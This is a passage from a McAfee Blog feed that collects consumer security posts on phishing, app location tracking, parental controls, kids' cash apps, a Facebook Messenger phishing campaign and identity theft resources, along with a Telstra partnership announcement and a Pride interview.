  • Change your passwords. If you provided the passwords to your bank account or another website, log into your account and change your passwords and login credentials. If you have other accounts with the same passwords, change those too. Don’t use the same passwords for more than one account. 
  • Call the credit card company. If you shared your credit card number, call and let them know. They can see if any fraudulent charges were made, block your current card, and issue a new credit card. 
  • Review your credit report. You can get free copies of your credit report every 12 months from all three major credit agencies — Experian, TransUnion, and Equifax — by going to AnnualCreditReport.com. Check to see if any new accounts were opened in your name. 
  • Scan your devices. There’s a chance you downloaded malware during the phishing attack. Antivirus software, like what’s included in McAfee Total Protection, can scan your devices in real time to detect malicious activity and remove viruses on your devices.  

How can I protect myself from phishing attempts?

You deserve to live online freely. But that might mean taking steps to protect yourself from phishing attempts. Here are some ways you can improve your cybersecurity and keep scammers at bay: 

  • Don’t click email links. If you receive an email from your bank or a company like Amazon, open a browser window and go directly to the company’s site. Don’t click a link in an email. 
  • Use unique passwords. If you use the same password for multiple accounts, a hacker that accesses one of your accounts might be able to break into all of your accounts. Use different passwords for each of your accounts. A password manager like McAfee True Key can help you create and save passwords. 
  • Check your browser security. Web browsers like Google Chrome and Safari can be set to block fraudulent websites. Go into the settings for your browser and adjust the security level. 
  • Use spam filters. All major email providers have spam filters that move suspicious emails into a junk or spam folder. When phishing emails do get to your inbox, always mark them as spam so all other emails from that source will go to the spam folder.  
  • Delete suspicious emails. Delete emails from financial institutions with urgent subject lines, for example. 
  • Use antivirus protection. All of your internet-connected devices should have antivirus protection like McAfee Total Protection. Set it to update automatically to keep your coverage current. 
  • Don’t email information. Banks and credit card companies won’t email you for personal data. If you want to confirm information with a financial institution, contact them directly with the information on their website, such as with a phone number. 
  • Watch your social media posts. Be careful about what you post on social media. Those quizzes where you mention life details, such as your pet’s name, school mascots, and so on, can provide hackers with a wealth of information. Make sure only friends can view your posts. 

Browse online safely and securely

You don’t have to stop enjoying the internet just because of phishing attempts. McAfee’s identity theft protection services, including antivirus software, make it possible to enjoy your digital world while staying safe from scammers and identity thieves.  

With 24/7 active monitoring of your sensitive data, including up to 60 unique types of personal information, McAfee is all about proactive protection. This means you’ll be alerted 10 months sooner than our competitors — so you can take action before your data is used illegally. We also provide up to $1 million of ID theft coverage and hands-on restoration service in the case of a data breach.  

The best part is that you can customize a package to meet your needs, including virus protection, identity theft monitoring, and coverage for multiple devices. We make it safer to surf the net. 

The post What Is Phishing? appeared first on McAfee Blog.

]]>
McAfee and Telstra Partner to Bring Privacy, Identity and Security to Australian Customers https://www.mcafee.com/blogs/mcafee-news/mcafee-and-telstra-partner-to-bring-privacy-identity-and-security-to-customers/ Mon, 11 Jul 2022 12:00:32 +0000 https://www.mcafee.com/blogs/?p=155532

McAfee announces a partnership that will grant new and existing Telstra customers easy access to McAfee’s leading security solutions to...

The post McAfee and Telstra Partner to Bring Privacy, Identity and Security to Australian Customers appeared first on McAfee Blog.

]]>

McAfee announces a partnership that will grant new and existing Telstra customers easy access to McAfee’s leading security solutions to deliver holistic security and privacy protection through its integrated suite of services including Antivirus, Parental Controls, Identity Protection, Secure VPN and more, to protect and secure multiple devices including mobiles, PCs and laptops. The partnership brings added protection to Telstra’s millions of customers and their devices via McAfee’s intuitive and integrated consumer security platform 

“A recent McAfee study found 27% of Australians surveyed reported attempted account theft and 23% had experienced financial account information leaks,” said Pedro Gutierrez, Senior Vice President of Global Sales and Operations at McAfee. “As the proliferation of life online accelerates, we are thrilled to be partnering with Telstra who are showing through this collaboration, a commitment to innovation and to their customers by investing in new infrastructure and technologies that safeguard their mobile and broadband subscribers. 

McAfee’s integrated consumer security platform offers a wide array of mobile security solutions to protect customers’ privacy and identity while blocking viruses, malware, spyware, and ransomware attacks. This partnership allows Telstra’s customers to take advantage of these capabilities and protect themselves from additional threats including potential hacks, identity theft and broader gaps in online and mobile security so they can live life confidently online.   

“In today’s increasingly connected world the risk of cyber threats continues to grow. To counter the risk, Telstra is committed to providing our customers with the safety and security features needed to protect them online,” said Matthew O’Brien, Cyber Security Executive and Group Owner at Telstra. “This partnership with McAfee helps drive our mission to build a safe and secure connected future where everyone can thrive, and further complements Telstra’s T25 ambition to extend our network leadership position by delivering greater value to our customers.”  

To activate Device Security, Telstra customers can simply go in-store, online or to their MyTelstra app. The full suite of McAfee features supported include Antivirus/System Scan, Safe Browsing, Protection Center, Identity Protection, Password Manager, Parental Controls, Protection Score and Secure VPN. All eligible Telstra customers can try Device Security for three months on Telstra, then auto-roll onto $10/month after. 

The post McAfee and Telstra Partner to Bring Privacy, Identity and Security to Australian Customers appeared first on McAfee Blog.

]]>
What Types of Apps Track Your Location? https://www.mcafee.com/blogs/tips-tricks/what-types-of-apps-track-your-location/ Wed, 06 Jul 2022 22:13:27 +0000 https://www.mcafee.com/blogs/?p=151204

Your mobile phone can do so many things, thanks to the wonders of technology. One of those things is having...

The post What Types of Apps Track Your Location? appeared first on McAfee Blog.

]]>

Your mobile phone can do so many things, thanks to the wonders of technology. One of those things is having very accurate information about your location. In fact, some apps have to know your location to work.  

Of course, you can’t expect Google Maps to function as it should without tracking your location. But you’re right to question why a messaging app like WhatsApp needs to know your whereabouts. When it comes to protecting your online privacy, the less information that third parties have about you, the better. 

Keep reading to learn which mobile apps have location tracking and how you can revoke their access. 

How to see which apps are tracking your location 

On an iPhone, apps can track your location, but only after giving them access first. Here’s how to check which apps can monitor your location:  

  1. Open the “Settings” app and click on “Privacy” to see a list of apps that have requested access to your location data. 
  2. Click on “Location Services.” This will show you every app that can request access to your location. You’ll also see if you’ve given any apps permission to track your location. Note that the permission you give to apps to access your location can be at all times or only when you’re using the app.  
  3. To check into a specific app, tap it. You’ll see what permission you’ve granted — the active one will have a checkmark. There are three options: 
  • Never: The app isn’t ever allowed to access your location data. 
  • When using the app: Whenever you open the app and use it, it’ll be able to track your whereabouts. 
  • Always: This means the app can access your location data at all times, whether you’re using it or not. 

If you have an Android device, you can check what permissions you’ve given to the app following these steps:  

  1. Go to “Settings.”  
  2. Then, go to “Apps & Notifications.”  
  3. Select an app, tap “Permissions,” and tap on the triple-dot icon.  
  4. Click on “All Permission” and scroll down to the Location section.  

You’ll see the GPS tracking permissions you’ve granted. The apps you’ve allowed access to your location all the time will be under “Allowed all the time.” The apps that can track you while you’re using them will be under “Allowed only while in use.” And you’ll find the apps you’ve never granted permission under “Not allowed.” 

How to stop apps from tracking your location

Remember that some apps need location data to function properly. For instance, a navigation app like Apple Maps isn’t very useful if it doesn’t know where you are. 

But whenever you want to turn off location tracking for particular apps, you can simply cancel their access. 

If you have an iOS device, follow these steps:  

  1. Open “Settings.”  
  2. Tap “Privacy” and click on “Location Services.”  
  3. Next, tap the app you want to change the location setting for.  
  4. Then, select the option you want, like “Always,” “While using,” or “Never.” 

To change the location setting for apps on an Android phone:  

  1. Tap on “Settings.”  
  2. Then, tap on “Apps & Notifications.”  
  3. Pick an app and tap on “Permissions.”  
  4. Switch “Location” to on or off. 

Common types of apps with location tracking

There are many reasons apps need to know your location history, such as personalizing your app experience. Not to mention that location tracking apps like Find My iPhone and family location-sharing apps like Life360 are very helpful for family members to keep track of their loved one’s location.  

But simply speaking, the main reason apps track your location is because it’s profitable. Your information is sold to marketers, making it easier to show you ads you should be interested in.   

This is why it’s always a good idea to check what apps access your location information. So, check them regularly, following the steps laid out above.  

Common apps to watch for location tracking include: 

Map apps

Of course, navigation apps need to know your current location so that they can direct you to where you want to go. Getting access to your real-time location allows them to give you turn-by-turn directions. The apps also use a GPS tracker to help you find establishments like restaurants or gas stations nearby.  

Ride-hailing apps

Ride-hailing apps like Uber and Lyft use your GPS location to let drivers know where to pick you up. Be careful about ride-hailing apps, though, because their tracking features are made to monitor your movement in the background. This means they can access your location all the time, even when the apps aren’t active.  

So, if you’re not a regular ride-hail user, check these phone tracking apps when you’re not using them and turn off the location settings until you need them again. 

Social media

Like most free apps, social media apps collect personal and location data so they can learn who you are. And everything they know about you is used for advertising purposes. This is why you might get “find my friends” suggestions and ads about cafes, stores, and everything else that’s available in your area.  

Something to be aware of is that the ways social media apps like Facebook ask for permission to access your location data aren’t always straightforward. For instance, if you’re posting a photo, the app will ask you to “Turn on Location Services” to add a geo-tag. And if you do, they’ve got the green light to track your whereabouts.  

News and weather apps

When you check the news and weather forecast by using an app, the app asks for your location to provide you with information based on where you are.  

Giving these apps your location can help with the user experience since you won’t have to search for local news or weather updates. But not giving the apps access to your phone location doesn’t affect how they operate.  

Coupon apps

Coupon apps like Flipp want as much information from you as possible to personalize your experience. Location sharing helps these apps provide you with the closest stores to shop and ongoing sales near you. 

In the case of coupon apps, geofencing helps in their marketing quite a lot. With geofencing, apps use radio frequency identification (RFID), Wi-Fi, and GPS location to send ads at exactly the right moment to a target device. The ad can be sent as an SMS, email, or app notification when a cellphone enters or leaves a geofence.  

An example would be a text message that says, “Today only! Spend $50 and get the item of the day for $0.99!” when a customer enters a grocery store.  

Streaming apps

Streaming apps like Netflix and Spotify may ask for your location so that you don’t get access to geo-restricted content. For instance, live streaming TV apps need your location to confirm regional blackouts and other features. But other than that, they don’t necessarily need to monitor your location to work. 

Insurance apps

Car insurance companies have found a way to use technology by offering discounts to clients who allow them to collect personal information and share location data. Some of the information they want include your phone use while driving, how fast you drive, or how sharply you brake. Insurance companies claim that their phone tracker apps collect data to reward good behavior and avoid accidents. 

See how McAfee Security for Mobile keeps your device safe

Our mobile phones are one of our most valuable possessions because we rely on them to get us through the day. That’s why it’s important to understand how information about you and your activities is used, shared, and sold.  

 

The good news is that you can protect your digital life with McAfee Mobile Security, which allows you to connect safely and seamlessly to the digital world with a virtual private network (VPN). You’ll also have access to an antivirus app that regularly scans for online threats like malware.  

 

This means you can use public hotspots, make bank transactions, and surf the web in a safe space. McAfee helps protect your credentials and personal information so that you can continue to enjoy the internet your way.  

The post What Types of Apps Track Your Location? appeared first on McAfee Blog.

]]>
Setting Up Parental Controls in TikTok, Instagram & Snapchat https://www.mcafee.com/blogs/family-safety/setting-up-parental-controls-in-tiktok-instagram-snapchat/ Wed, 06 Jul 2022 21:59:45 +0000 https://www.mcafee.com/blogs/?p=155464

It’s a question we get a lot from parents: “How can I keep my kids safe when they are constantly...

The post Setting Up Parental Controls in TikTok, Instagram & Snapchat appeared first on McAfee Blog.

]]>

It’s a question we get a lot from parents: “How can I keep my kids safe when they are constantly hopping between so many different apps?” We get it, there’s a lot to stay on top and all of it changes constantly. Unfortunately, that question doesn’t have a simple answer. But there are some baseline actions every parent can take to boost their child’s safety on popular apps like TikTok, Snapchat, and Instagram.  

The safety equation is threefold, with every piece as important to your child’s overall safety as the next.  

  1. Connection and conversation. The first part of the safety equation is maintaining a strong relationship with your child so that dialogue (two-way; no lectures) on digital safety and wellbeing becomes commonplace and they know they can come to you if they have a problem. One way to keep those conversations rolling is to download your child’s favorite apps so that you understand first-hand how the communities work and the type of content that’s being shared. 
  2. Install parental controls. The second part of the safety equation is to add parental controls. Do we have an agenda here? You betcha! For decades, we’ve put some of the world’s brightest engineering minds into designing digital tools that allow families to enjoy the best of the Internet without giving them the rest of the Internet that could put their emotional and physical wellbeing at risk. McAfee’s targeted software helps parents monitor and filter web searches and content, set time limits, and view daily activity reports.  
  3. Access platform tools. The third way is to take a few minutes to ensure your kids are using the platform-level tools available on both their devices and within the apps. Both Apple and Android phones have basic safety and wellbeing features. Additionally, the apps your kids likely love—Tik Tok, Snapchat, and Instagram—have their own set of safety tools.  

Screentime is Climbing 

A report released in 2021 by Common Sense Media found that teenagers (ages 13-18) use an average of nine hours of entertainment media per day and that tweens (ages 8-12) use an average of six hours a day, not including time spent using media for school or homework. The report also found that boys spend more time on gaming devices while girls spend more time on social media and that mobile devices now account for 41% of all screen time among tweens and 46% among teens. 

With those numbers increasing each year, it’s even more important to understand the different ways parents can help kids stay safe. Let’s break down a few safety basics on each app that are easy to access and use.    

Tik Tok Safety 

TikTok has some impressive safety guidelines broken down into topics parents could easily use as a springboard for some great family discussions. The guidelines and the Safety Center cover issues such as dangerous TikTok challenges and how to deal with other digital threats such as bullying, sexual content, fake news, and hateful behavior. You can increase safeguards using TikTok’s: 

  • Family Pairing. TikTok offers Family Pairing that allows parents to link their account with their child’s to co-control settings on privacy and content. This TikTok feature allows a parent to monitor and manage screen time, direct messages, set restrictions, and control friend and comment filters.  
  • Restricted Mode. There is a Restricted mode for accounts that can help filter basic mature content on TikTok. 
  • Privacy Settings. To ensure your child isn’t connecting with unknown people on TikTok, you can go into the settings and make their account private.  
  • Digital Wellbeing. We all know how easy it is to get sucked into spending hours on an app without even getting up to stretch or give our eyes or minds a break. Turning this function on will send alerts to users who have been on the app for more than two hours.  

Snapchat Safety 

Every app functions differently and thus, offers different ways to boost security. Snapchat provides a helpful guide for parents and educators, including safety tips and conversation starters. You can increase safeguards using Snapchat’s: 

  • Privacy Settings. Sit down with your child to ensure their privacy settings are adjusted to choose who can send them Snaps, view their Stories, or see their location on Snap Map. They can also manage who views your child’s content with My Story. 
  • Friends Only Feature. Snapchat was made for keeping in touch with your close friends, so the app Safety Center recommends users “only friend or accepts friend requests from people that you know in real life.” 
  • Report Abuse Feature. Ensure your kids understand how to report abuse on Snapchat, including harassment, bullying, or other safety concerns. If someone makes them uncomfortable, they can block that Snapchatter and leave any group chat. Here’s more on reporting abuse or safety concerns. 
  • Think before you share. Snaps are designed to delete by default within 24 hours. However, remind your kids that people who send Snaps can still take a screenshot or take a picture of the Snap with another device. Therefore, on Snapchat especially, advise your kids to think before sharing. 

Instagram Safety 

Instagram offers parents and minor users a library of safety and mental health resources accessible via the app’s Community Tab at the bottom of its home page. You can increase safeguards using Instagram’s: 

  • Family Center. A parent or guardian can supervise a teen’s Instagram account, provide extra support, and help balance their time. Parents of teens can remove supervision anytime, and the tool is automatically removed when the teen turns 18. 
  • Privacy Controls. Your teen’s account can be set to private, which means their content will only be seen by approved followers. In addition, they can also block and report abusive accounts.  
  • Comment Controls. Avoid unwanted interactions by encouraging your child to use “Comment Controls.” In addition, reporting and blocking tools also allow them to manage who can comment on their posts.  
  • Direct Message Safeguards. Instagram restricts Direct Messages (DMs) between teens (under 18) and adults they don’t follow. When an adult tries to message a teen who doesn’t follow them, they receive a notification that DM’ing that teen isn’t an option. For adults and teens already connected (i.e., one account follows the other), Instagram sends safety notices encouraging teens to be cautious in conversations with adults who have exhibited potentially suspicious behavior. (Note: This feature does not protect kids from connecting with fraudulent catfish accounts created using false profile and age information). 

One of the most powerful safety features is you—a child’s mom, dad, or guardian. Your face-to-face, heart-to-heart connection will speak loudest in your child’s life. If you haven’t lately, ask your child what’s going on in their digital life, who their friends are, what they’ve created to share, and what’s new, hilarious, or trending. You may get some resistance now and then but don’t let that discourage you from pressing in and doing all the things that help keep them as safe as possible online.   

The post Setting Up Parental Controls in TikTok, Instagram & Snapchat appeared first on McAfee Blog.

]]>
#McAfeePride2022 https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/mcafeepride2022/ Tue, 05 Jul 2022 18:15:04 +0000 https://www.mcafee.com/blogs/?p=155431

In the spirit of #PrideMonth, McAfee hosted month-long celebrations across the world. One of these was a live event hosted...

The post #McAfeePride2022 appeared first on McAfee Blog.

]]>

In the spirit of #PrideMonth, McAfee hosted month-long celebrations across the world. One of these was a live event hosted by the McAfee Pride Community with a guest speaker from the Resource Center that focused on the history of Pride, support, allyship, and belonging.

We took a moment to ask our event guest speaker, Leslie McMurray, about the work that Resource Center does, the importance of pride, and what companies can do to create inclusive work environments.

Tell us a bit about Resource Center and what you do?

“We like to say, if we had an “elevator pitch”, we would need a really tall building! Resource Center has been around for 39 years and is one of the largest LGBTQIA+ community centers in the United States, it is a primary HIV/AIDS service organization in Texas.

Some of the work that we do includes operating a food pantry and hot meal program that serves low-income people living with HIV. We have a case management department that helps locate resources that we don’t directly provide, like housing. And we have a primary care clinic that is gender-affirming and a ten-chair dental clinic that also serves those living with HIV.

We also have a youth program called Youth First that serves youth from middle-to-high school. We have a behavioral health program and a clinic that does free testing for HIV and STDs along with a mobile health unit that does free testing in outlying areas. Finally, our advocacy department has three full-time employees!

Why it is important to learn about pride?

“Sometimes we get asked “What’s ‘Pride’ about? Why do you need a parade?”

It’s important to understand that LGBTQIA+ people are still working to achieve equal rights – the same as everyone else.

The tipping point of the fight for equal rights in the US dates back to 1969 when the Stonewall Uprising took place in Manhattan. The first Pride march was held a year later to honor the anniversary of the Stonewall Uprising and continues to take place during the month of June each year. And while we appreciate the attention during the month, the continued fight for equal rights for the LGBTQIA+ community is yearly, and we need continuous support and allyship of people and businesses year-round.

So it’s really important for people to learn about diverse populations, understand what their challenges are, and educate yourself on these issues – from that spring’s allies.”

What should companies do to create inclusive work environments

“One of the simplest things for companies to do is to include ‘Sexual Orientation, Gender Identity and Gender expression’ in your Equal Employment Opportunity statement. Other things companies can do is to look at putting a policy in place for transgender employees who are transitioning and consider including transgender healthcare in your company benefits package.

Make sure to help foster understanding by getting employees to do training with organizations like Resource Center. And empower upper management to lead the way ensuring all employees can bring their whole selves to work. Finally, when the opportunity arises look at working with and bringing in non-profit organizations into your company to continue spreading awareness and support for the LGBTQIA+ community.

And while June wraps up Pride month, year-round we work towards a workplace and community where all can belong – a workplace where our unique differences are celebrated and where we all stand together for equality. #McAfeePride

Learn more about the incredible work that Resource Center does here

Interested in building your career at a company where you can belong? Search our openings!

The post #McAfeePride2022 appeared first on McAfee Blog.

]]>
Kids & Cash Apps: What Parents Need to Know https://www.mcafee.com/blogs/family-safety/kids-cash-apps-what-parents-need-to-know/ Tue, 05 Jul 2022 18:06:31 +0000 https://www.mcafee.com/blogs/?p=155401

Fewer people carry cash these days, kids included. This growing paperless reality fast-forwards the parenting task of educating kids on...

The post Kids & Cash Apps: What Parents Need to Know appeared first on McAfee Blog.

]]>

Fewer people carry cash these days, kids included. This growing paperless reality fast-forwards the parenting task of educating kids on financial responsibility. As of 2021, most cash apps allow kids 13 and up to open accounts (previously, the age was 18). Kids can also get a cash app debit card for retail purchases. But while cash apps are a popular and convenient tool, they come with some risks families should consider.  

Instant Transactions 

Cash apps allow kids to exchange money with friends directly from a secondary established account, much like handing another person cash. Cash apps have become a popular tool with kids and an easy way to split costs or pay someone for a purchase. Cash apps also come in handy for families and allow parents to instantly send their children money for daily expenses such as school or sports fees, meals, purchases, or entertainment. Some common cash apps include Venmo, Zelle, Cash App (Square), Pay Pal, Zelle, and Facebook Pay, among others.   

Some Risk 

Sounds awesome right? But with ease comes risk. Most money transfer app funds are not FDIC insured. That means if your child (or you) accidentally sends money to an unintended recipient, they may have a tough time recovering those funds.  

Every app comes with some degree of risk. While the leading cash apps are considered secure and can be used with little concern, there’s always the potential of a cyber crook finding a security loophole that exposes your money, banking information, and identity.  

10 Cash App Safety Tips for Families 

  1. Discuss the risks. Clicks within a cash transfer app equal real cash. Help your kids understand digital money is equal to actual dollars. Take the time to discuss current scams and how to practice extra care when using cash apps.  
  2. Use safeguards. Using security best practices is not a skill that comes naturally to most people. It’s something that must be practiced and improved constantly. Just like computers, mobile devices can be infected with viruses and malware. One way to protect mobile devices (and cash apps) is to subscribe to a mobile antivirus product, such asMcAfee Mobile Security, which includessafe browsing, scanning for maliciousapps, and locating your device if it is lost or stolen. 
  3. Layer up app security. In addition to an antivirus tool, guide your kids in how to add additional security to their cash apps. Guide them in how to follow password security protocols and how to add protection in the form of a PIN code, facial ID, or fingerprint ID. While you are at it, make sure your child locks their device in the same way. These steps offer more protection in case your child’s phone is stolen or lost, and a stranger attempts to use the cash app.  
  4. Slow down and verify. As fast as kids’ fingers move on keypads, advise your child to slow down and verify spelling and a recipient’s account address when using a cash app. Most cash app providers will not help users recover misdirected funds. One typo or clicking on the wrong Jake Williams in the recipient list can cost you or your child big bucks.  
  5. Only connect with friends.When using cashapps, advise kids to only exchange money with people they know. Scammers have been known to befriend minors only to ask for a loan or offer goods or services. Once the payment is sent, the scammer instantly deletes their accounts and is gone without a trace.  
  6. Stay on top of cash app scams. CheckBBB Scam Trackerto see how bad actors are targeting cash app users. In searching cash app scams on this site, consider reading the personal stories (click “details” of each reported scam) of the people who have been victimized. This might be a very effective way to converse with your kids about the natural consequences of online scams.  
  7. Safeguard personal data. Remind kids not to share their email, address, or other information. Also, avoid clicking pop-up ads, trendy quizzes, and random website URLs designed to plant malware on a device that steals bits and pieces of personal info that can be used for various attacks, including financial and identity theft.  
  8. Link your app with a credit card. If possible, consider linking your child’s cash app to a credit card rather than a bank account. Debit cards remove cash from an account instantly, but credit cards offer consumer protection in cases of fraudulent transactions. The one drawback is that a credit card company will charge interest on your balance.  
  9. Keep app balances low. Cyber crooks can’t steal funds that aren’t there. For that reason, it’s wise to keep balances low in your child’s cash app account.  
  10. Teach financial literacy basics. The cash app conversation is an excellent opportunity to begin or expand your family’s conversation on financial literacy. Here are several helpful resources that will help you teach your kids financial literacy at any age.     

The use of cash apps is here to stay and, no doubt, an integral part of the overall paperless fast track we’re all on. Guiding kids into this realm equipped with knowledge and confidence is a powerful way parents can help kids enjoy the responsibility of money without falling prey to digital risks.     

The post Kids & Cash Apps: What Parents Need to Know appeared first on McAfee Blog.

]]>
Over 10 Million Facebook Users Hacked in Ongoing Phishing Scam https://www.mcafee.com/blogs/internet-security/over-10-million-facebook-users-hacked-in-ongoing-phishing-scam/ Tue, 05 Jul 2022 17:57:50 +0000 https://www.mcafee.com/blogs/?p=155355

In this digital age, communicating online and through our devices has become the norm. From sharing highlights of last night’s...

The post Over 10 Million Facebook Users Hacked in Ongoing Phishing Scam appeared first on McAfee Blog.

]]>

In this digital age, communicating online and through our devices has become the norm. From sharing highlights of last night’s game to sending cute animal videos back and forth, so much of our connectedness happens virtually. It’s become so easy to chat with friends and loved ones through social media that we don’t even have to think about it. We know who’s on the other end of the screen, so why would we worry? We know our friends would never send us a malicious link that would steal our information, so why be cautious? Right? 

Not necessarily. Though a message or link may seem like it’s coming from a friend, it’s also possible that it was sent without their knowledge. There are many ways for hackers to scam people very believably. The latest Facebook Messenger hack is just one of many examples. 

Facebook Frenemies 

According to PIXM, Facebook users have been conned for several months by a phishing scam that tricks them into handing over their account credentials. Users are shown a fake login page that copies Facebook’s user interface, giving it the illusion of being real. When someone enters their credentials, their password and login combo is sent to the hacker who then sends out the same link and fake login to the user’s friends through Facebook Messenger. Any user who clicks the link is asked to fill out their credentials, and the cycle repeats. PIXM estimates that over 10 million Facebook users have been duped by this scam since 2021. 

This hacker was able to utilize a technique to evade Facebook’s security checks. When a user clicks on the link in the Messenger app, the browser redirects to a legitimate app deployment service, then redirects again to the actual phishing pages with advertisements and surveys that accrue revenue for the hacker. Using this legitimate service link prevents Facebook from blocking it without blocking other legitimate apps and links as well. Researchers say that even if Facebook managed to block one of these links, several others are created with new unique IDs every day to replace it. 

Phishing scams like these are harder to detect due to the realistic-looking interface on the login pages and that these malicious links are seemingly coming from friends and family. However, there are always key things to look out for when faced with phishing scams. 

Swim Away From These Phishes 

Scams don’t always come from overtly sketchy emails or text messages from strangers. Sometimes they can (unintentionally) come from people we know personally. This isn’t to say that your friends online can’t be trusted! However, it’s important to always be cautious and keep an eye out for any odd behavior to stay on the safe side. Here are some key things to look out for when faced with potential malicious phishing scams: 

  • Lack of personalization. These types of scams may be coming from online friends you don’t speak to often, if at all. If someone you rarely speak to is sending you links out of the blue, that’s an automatic red flag. But if you’re still unsure or if this is coming from someone you know well, pay close attention to the message, the greeting (if any), and whether it’s personalized or not. If it seems cold or overly general, avoid it!
  • Links don’t look quite right. If you’re receiving a link through email, hover over the URL without clicking on it to see the link preview. If it looks suspicious, delete it altogether. For links being sent through social platforms, check to see if the URL matches the content in the message being sent to you or if there is a preview attached. If these things don’t match or aren’t present, it’s best to play it safe and stay away.
  • Spelling and tone seem off. If the message you’re receiving is riddled with spelling or grammar mistakes, proceed with caution, especially if it’s unlike your friend to have those types of errors in their messages. In that same vein, if the tone of the message doesn’t match the typical vibe of the person you’re receiving it from, it’s best to ignore it and move on!
  • The message is telling you to act. Always be wary of a strange message and link asking you to act. If the message is telling you to download something, don’t click any links or attachments. Simply delete the message and carry on!

When in doubt, just ask! If you’ve received a message and a link from a friend online, simply ask if they meant to send it to you. If they didn’t send it themselves, not only did you dodge a bullet, but your friend is also now aware that they’ve been hacked and can take the necessary precautions to ensure their information is protected. And if they did mean to send it to you, then you can click the link knowing that it’s safe to do so. It’s always best to err on the side of caution when it comes to your online security. 

The post Over 10 Million Facebook Users Hacked in Ongoing Phishing Scam appeared first on McAfee Blog.

]]>
5 Ways to Get Victim Assistance for Identity Theft https://www.mcafee.com/blogs/tips-tricks/5-ways-to-get-victim-assistance-for-identity-theft/ Tue, 05 Jul 2022 14:20:55 +0000 https://www.mcafee.com/blogs/?p=151192

The internet makes a lot of things in life easier. You can shop, pay your bills, and even book your...

The post 5 Ways to Get Victim Assistance for Identity Theft appeared first on McAfee Blog.

]]>

The internet makes a lot of things in life easier. You can shop, pay your bills, and even book your next getaway. Unfortunately, the internet is also home to some less-than-savory characters who are looking to take sensitive information for personal gain. 

Private information like credit card numbers, driver’s license numbers, phone numbers, and Social Security numbers (SSN) can fall into the wrong hands — leading to identity thieves opening new accounts, taking out loans, and even filing tax returns in their victims’ names.  

Fortunately, victims of identity theft and concerned individuals can access several helpful resources designed to respond to or prevent identity theft through the Federal Trade Commission (FTC), such as IdentityTheft.gov. McAfee Identity Protection can also keep personal information secure with 24/7 monitoring and restoration support.  

This article will explain some common types of identity theft and the resources you can turn to in case identity theft becomes an issue for you.  

What are the most common types of identity theft?

The internet is the place to be if you’re looking to shop, connect with others, and get access to all the information you could ever need. Obviously, we spend a lot of time online, and cybercriminals know that.  

The good news is that a little information can go a long way in protecting your sensitive data. Some common types of identity theft include:  

  • Financial identity theft: Criminals can use your personal information for their financial gain. They might use personal bank funds or credit cards to make purchases or open a new line of credit in your name and leave you with the bill.  
  • Criminal identity theft: Some criminals will go to great lengths to avoid arrest. Fraudsters can give a different name and show a stolen ID to get a clean getaway. This can leave you with a false criminal report in your name.  
  • Medical identity theft: Medical identity thieves pose as someone else and can access medical services, like surgeries, or get prescription drugs and other medical devices and supplies. This can affect your health insurance coverage and make access to health care difficult.  
  • Child identity theft: This type of offender commits financial fraud with a minor’s personal information, such as their SSN. With this information, an identity thief can apply for government benefits, get a driver’s license, and even buy a house.  
  • Synthetic identity theft: Identified as the fastest-growing financial crime, criminals create an identity persona from real information and create a completely new and fake credit file.  

If you have any reason to believe your identity has been stolen, it’s important to report identity theft or suspicious activity to local police, financial institutions, and credit card companies as quickly as possible. You’ll also want to get a copy of your credit reports from each of the major credit bureaus by visiting annualcreditreport.com and routinely check all of your bank statements. 

5 ways to get identity theft victim assistance

Identity theft can be scary, but several resources exist to help victims. Some key ID theft resources include the IRS, IdentityTheft.gov, IDtheftcenter.org, Fraud.org, and McAfee Total Protection.  

IRS Identity Theft Victim Assistance

The Internal Revenue Service (IRS) can help with tax-related identity theft. Tax-related identity theft victims may self-report or receive a notice or letter from the IRS about a suspiciously filed tax return. Signs of tax-related ID theft include receiving a tax transcript you didn’t ask for, getting a report of unknown wages or other income, or not being able to e-file because of a matching SSN.  

Whether you report identity theft or suspicious activity to the IRS or they tell you, you’ll want to follow instructions to resolve any fraudulent tax issues. You may need to verify your identity with Letter 4883C or complete an Identity Theft Affidavit (Form 14039).  

Once everything has been settled, the IRS will tag your account with an identity theft indicator for added protection in the future. In some circumstances, you may even receive an Identity Protection Pin (IP PIN) to use when filing an electronic or paper tax return.  

IdentityTheft.gov

IdentityTheft.gov is a federal resource that can help victims recover from identity theft. The site provides an overview of victim rights, sample letters you can use to dispute any fraudulent credit or debit card charges, and a checklist to track your progress.  

IdentityTheft.gov can help with any identity theft, including that related to student loans and fraudulent unemployment insurance claims. You’ll need to explain your situation in great detail to receive a personalized recovery plan.  

IDtheftcenter.org

The Identity Theft Resource Center (ITRC) helps prevent, recover, and protect individuals and businesses from identity theft. This nonprofit organization provides information and assistance at no cost and can help with account takeovers, data breaches, email scams, and other fraudulent account activities. You can also sign up for ID Theft News and stay informed with newsletters and alerts.  

Identity theft victims can use the online chat or call to speak with an adviser who can help figure out the next steps to take. They may suggest filing a police report, placing a credit freeze, and/or obtaining free credit report copies from the major credit bureaus, like Experian, TransUnion, and Equifax.  

Fraud.org

A project of the National Consumers League, Fraud.org collects and shares decades worth of consumer complaints related to fraud. With advocacy, education, and consumer counseling, Fraud.org helps consumers protect themselves from telemarketing and internet fraud.  

Fraud.org raises awareness about many types of common and unexpected scams, including phony sweepstakes prizes, government grants and scholarships, online phishing for financial account numbers and other personal information, malware downloads, and the possibility of a financially disastrous ending after falling in love online.  

You can sign up for fraud alerts or file a complaint on the secure website and Fraud.org will share your story with their network of law enforcement agencies.  

McAfee Total Protection

Identity protection with McAfee Total Protection Ultimate provides around-the-clock email address and bank account monitoring, which includes $1 million of ID theft coverage on qualifying losses. As a subscriber, you’ll also gain access to hands-on restoration support to help with reclaiming your identity.  

McAfee Total Protection can go wherever you go. Stay in the know on your tablet, laptop, or smartphone and receive critical alerts. The software also provides a Protection Score that can help you secure any weak areas that may leave you open to ID theft.  

See how McAfee Identity Protection keeps you safe

Use the internet your way and protect your sensitive information with 24/7 account monitoring and alerts. McAfee Total Protection adds an additional layer of security by keeping tabs on up to 60 unique types of personal information. We’ll also guide you through the best choices for prevention and alert you as soon as action is needed.  

Get protection from data breaches and malicious software like viruses and malware and benefit from fraud alerts 10 months sooner than our competitors. Get the peace of mind that comes with knowing that McAfee is looking out for you and keeping your identity safe. 

The post 5 Ways to Get Victim Assistance for Identity Theft appeared first on McAfee Blog.

]]>
It’s Social Media Day! Here’s How to Protect Yourself From Social Engineering Online https://www.mcafee.com/blogs/privacy-identity-protection/its-social-media-day-heres-how-to-protect-yourself-from-social-engineering-online/ Thu, 30 Jun 2022 11:38:31 +0000 https://www.mcafee.com/blogs/?p=154501

